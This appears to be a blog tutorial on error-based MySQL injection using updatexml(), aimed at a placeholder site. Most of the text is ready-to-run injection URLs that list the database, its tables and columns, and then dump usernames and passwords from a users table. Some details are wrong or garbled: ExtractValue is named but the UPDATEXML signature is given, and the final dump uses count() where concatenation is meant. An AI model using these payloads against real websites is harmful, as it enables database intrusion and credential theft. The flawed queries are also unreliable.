Now we can continue our discussion after the Basic Union based and Bypassing Row Limit injections comes XPATH. Things to keep in mind if you landed on this page searching for Specifically XPATH Based injection then let me tell you its the wrong place. Here we are not actually injecting into XPATH, we are just using one of the XPATH function which is Extractvalue() to generate error and get the output.

The "ExtractValue" function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form:

UPDATEXML(XMLType_Instance, XPath_string,value_expression, namespace_string)

If the XPath query is syntactically incorrect, we are presented with an error message:

XPATH syntax error: 'xpathqueryhere'

We use it in the same condition like other error based injections but sometimes if Extractvalue is not available or filtered by the firewall then we can use this one. When we try Union based query first step and do not get any output then we can try using Error based injection. For Example we used the below query and got no output.

www.vuln-web.com/index.php?view=-35" union select 1,2,3,4,5--


As you can see the double quote over there..that means this time we are injecting into a string type query where the query is like. Now we can easily assume the internal query.

Query:
select path from pages where view="<our_input_here>" limit 1,1;


So let us continue our injection using XPATH updateXML injection.

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(OUR QUERY HERE)),null)--

Getting the Current Database :

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(0x0a,(select database()))),null)--

Output : XPATH syntax error: ':database_name_here'

Getting tables in current Database:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--

Output : XPATH syntax error: ':table_name_here'

as you can see i used limit as we cannot extract long data which limits upto 32 characters. So i prefer :P to go one by one increasing the row to get the output. well if you want to dump the database go for any tool or manual proxy else create your own script to get the data dumped for you which I prefer to be the best option.

So Now lets assume we got the following tables using the above Query:

Posts
Assets
Banner
Links
Users


Let us continue and try to get the columns:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),null)--

Output : XPATH syntax error: ':column_name_here'

Let Us say we got the 3 Columns:

id
username
password


Let us Dump the data from them, but before that lets count the number of Columns.

Counting the number of columns:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username) from users)),null)--

Output : XPATH syntax error: ':count_will_come_here'

You can use the same trick to count the tables or columns also. So now let us continue dumping the data

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username,0x3a,password) from users limit 0,1)),null)--

Output : XPATH syntax error: ':Output_here'

If you have problem understand Limit or any other thing...i suggest to read the basics again.

Đăng nhận xét Blogger

 
Top